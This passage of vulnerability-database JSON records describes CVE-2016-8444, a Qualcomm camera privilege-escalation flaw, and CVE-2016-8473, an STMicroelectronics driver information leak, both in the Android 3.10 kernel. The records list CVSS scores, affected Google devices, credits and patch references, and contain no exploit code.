      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Qualcomm Vulnerability that could elevate privileges in cameras",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006749"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "permissions and access control",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-049"
      }
    ],
    "trust": 0.6
  }
}

var-201701-0115
Vulnerability from variot

An elevation of privilege vulnerability in the Qualcomm camera could enable a local malicious application to execute arbitrary code within the context of the kernel. This issue is rated as High because it first requires compromising a privileged process. Product: Android. Versions: Kernel-3.10. Android ID: A-31243641. References: QC-CR#1074310. GoogleNexus is a smart device from Google. Google Nexus is prone to multiple privilege-escalation vulnerabilities. These issues are being tracked by Android Bug IDs A-31225246 and A-31243641

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201701-0115",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 2.4,
        "vendor": "linux",
        "version": "3.10"
      },
      {
        "model": "android one",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "google",
        "version": "0"
      },
      {
        "model": "nexus 6p",
        "scope": null,
        "trust": 0.9,
        "vendor": "google",
        "version": null
      },
      {
        "model": "nexus",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "google",
        "version": "6"
      },
      {
        "model": "nexus",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "google",
        "version": "5x"
      },
      {
        "model": "pixel",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "google",
        "version": "0"
      },
      {
        "model": "pixel xl",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "google",
        "version": "0"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00174"
      },
      {
        "db": "BID",
        "id": "95238"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006754"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8444"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-050"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:3.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2016-8444"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Di Shen (@returnsme) of KeenLab (@keen_lab), Tencent.",
    "sources": [
      {
        "db": "BID",
        "id": "95238"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-050"
      }
    ],
    "trust": 0.9
  },
  "cve": "CVE-2016-8444",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "HIGH",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.6,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 4.9,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": true,
            "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "High",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 7.6,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2016-8444",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2017-00174",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "HIGH",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.0,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.0,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          {
            "attackComplexity": "High",
            "attackVector": "Local",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.0,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2016-8444",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "Required",
            "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2016-8444",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2017-00174",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201701-050",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2016-8444",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00174"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8444"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006754"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8444"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-050"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "An elevation of privilege vulnerability in the Qualcomm camera could enable a local malicious application to execute arbitrary code within the context of the kernel. This issue is rated as High because it first requires compromising a privileged process. Product: Android. Versions: Kernel-3.10. Android ID: A-31243641. References: QC-CR#1074310. GoogleNexus is a smart device from Google. Google Nexus is prone to multiple privilege-escalation vulnerabilities. \nThese issues are being tracked by Android Bug IDs A-31225246 and A-31243641",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2016-8444"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006754"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-00174"
      },
      {
        "db": "BID",
        "id": "95238"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8444"
      }
    ],
    "trust": 2.52
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2016-8444",
        "trust": 3.4
      },
      {
        "db": "BID",
        "id": "95238",
        "trust": 2.6
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006754",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-00174",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-050",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8444",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00174"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8444"
      },
      {
        "db": "BID",
        "id": "95238"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006754"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8444"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-050"
      }
    ]
  },
  "id": "VAR-201701-0115",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00174"
      }
    ],
    "trust": 0.06
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00174"
      }
    ]
  },
  "last_update_date": "2023-12-18T13:19:38.555000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Android Security Bulletin - January 2017",
        "trust": 0.8,
        "url": "https://source.android.com/security/bulletin/2017-01-01.html"
      },
      {
        "title": "Linux Kernel Archives",
        "trust": 0.8,
        "url": "http://www.kernel.org/"
      },
      {
        "title": "Patch for GoogleNexusQualcommCameraDriver Privilege Escalation Vulnerability (CNVD-2017-00174)",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/87667"
      },
      {
        "title": "Google Nexus 6P , Nexus 6  and Nexus 5X Android Qualcomm Camera Fixes for permission permissions and access control vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=66794"
      },
      {
        "title": "Android Security Bulletins: Android Security Bulletin\u2014January 2017",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=android_security_bulletins\u0026qid=e8654f311f23268a7da69416ca7535a2"
      },
      {
        "title": "CVE-Study",
        "trust": 0.1,
        "url": "https://github.com/thdusdl1219/cve-study "
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00174"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8444"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006754"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-050"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-284",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006754"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8444"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.4,
        "url": "http://www.securityfocus.com/bid/95238"
      },
      {
        "trust": 1.8,
        "url": "https://source.android.com/security/bulletin/2017-01-01.html"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-8444"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-8444"
      },
      {
        "trust": 0.3,
        "url": "http://www.android.com/"
      },
      {
        "trust": 0.3,
        "url": "http://www.google.com/nexus/"
      },
      {
        "trust": 0.3,
        "url": "https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=42a98c44669d92dafcf4d6336bdccaeb2db12786"
      },
      {
        "trust": 0.3,
        "url": "https://source.android.com/security/bulletin/2017-01-01.html "
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/284.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00174"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8444"
      },
      {
        "db": "BID",
        "id": "95238"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006754"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8444"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-050"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00174"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8444"
      },
      {
        "db": "BID",
        "id": "95238"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006754"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8444"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-050"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-01-06T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-00174"
      },
      {
        "date": "2017-01-12T00:00:00",
        "db": "VULMON",
        "id": "CVE-2016-8444"
      },
      {
        "date": "2017-01-03T00:00:00",
        "db": "BID",
        "id": "95238"
      },
      {
        "date": "2017-01-25T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2016-006754"
      },
      {
        "date": "2017-01-12T20:59:00.983000",
        "db": "NVD",
        "id": "CVE-2016-8444"
      },
      {
        "date": "2017-01-05T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201701-050"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-01-06T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-00174"
      },
      {
        "date": "2017-01-24T00:00:00",
        "db": "VULMON",
        "id": "CVE-2016-8444"
      },
      {
        "date": "2017-01-12T01:09:00",
        "db": "BID",
        "id": "95238"
      },
      {
        "date": "2017-01-25T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2016-006754"
      },
      {
        "date": "2017-01-24T00:04:19.477000",
        "db": "NVD",
        "id": "CVE-2016-8444"
      },
      {
        "date": "2017-01-10T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201701-050"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-050"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Qualcomm Vulnerability that could elevate privileges in cameras",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006754"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "permissions and access control",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-050"
      }
    ],
    "trust": 0.6
  }
}

var-201701-0144
Vulnerability from variot

An information disclosure vulnerability in the STMicroelectronics driver could enable a local malicious application to access data outside of its permission levels. This issue is rated as Moderate because it first requires compromising a privileged process. Product: Android. Versions: Kernel-3.10. Android ID: A-31795790. STMicroelectronics The driver contains a vulnerability in which information is disclosed. GoogleNexus is a smart device from Google. Attackers can exploit vulnerabilities to obtain potentially sensitive information. Information obtained may aid in further attacks

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201701-0144",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 2.4,
        "vendor": "linux",
        "version": "3.10"
      },
      {
        "model": "nexus 6p",
        "scope": null,
        "trust": 0.9,
        "vendor": "google",
        "version": null
      },
      {
        "model": "nexus",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "google",
        "version": "5x"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00237"
      },
      {
        "db": "BID",
        "id": "95233"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006785"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8473"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-055"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:3.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2016-8473"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Peter Pi (@heisecode) of Trend Micro.",
    "sources": [
      {
        "db": "BID",
        "id": "95233"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-055"
      }
    ],
    "trust": 0.9
  },
  "cve": "CVE-2016-8473",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "HIGH",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 2.6,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 4.9,
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "LOW",
            "trust": 1.0,
            "userInteractionRequired": true,
            "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "High",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 2.6,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2016-8473",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Low",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2017-00237",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "HIGH",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.7,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.0,
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N",
            "version": "3.0"
          },
          {
            "attackComplexity": "High",
            "attackVector": "Local",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 4.7,
            "baseSeverity": "Medium",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2016-8473",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "Required",
            "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2016-8473",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2017-00237",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201701-055",
            "trust": 0.6,
            "value": "LOW"
          },
          {
            "author": "VULMON",
            "id": "CVE-2016-8473",
            "trust": 0.1,
            "value": "LOW"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00237"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8473"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006785"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8473"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-055"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "An information disclosure vulnerability in the STMicroelectronics driver could enable a local malicious application to access data outside of its permission levels. This issue is rated as Moderate because it first requires compromising a privileged process. Product: Android. Versions: Kernel-3.10. Android ID: A-31795790. STMicroelectronics The driver contains a vulnerability in which information is disclosed. GoogleNexus is a smart device from Google. Attackers can exploit vulnerabilities to obtain potentially sensitive information. Information obtained may aid in further attacks",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2016-8473"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006785"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-00237"
      },
      {
        "db": "BID",
        "id": "95233"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8473"
      }
    ],
    "trust": 2.52
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2016-8473",
        "trust": 3.4
      },
      {
        "db": "BID",
        "id": "95233",
        "trust": 2.6
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006785",
        "trust": 0.8
      },
      {
        "db": "CNVD",
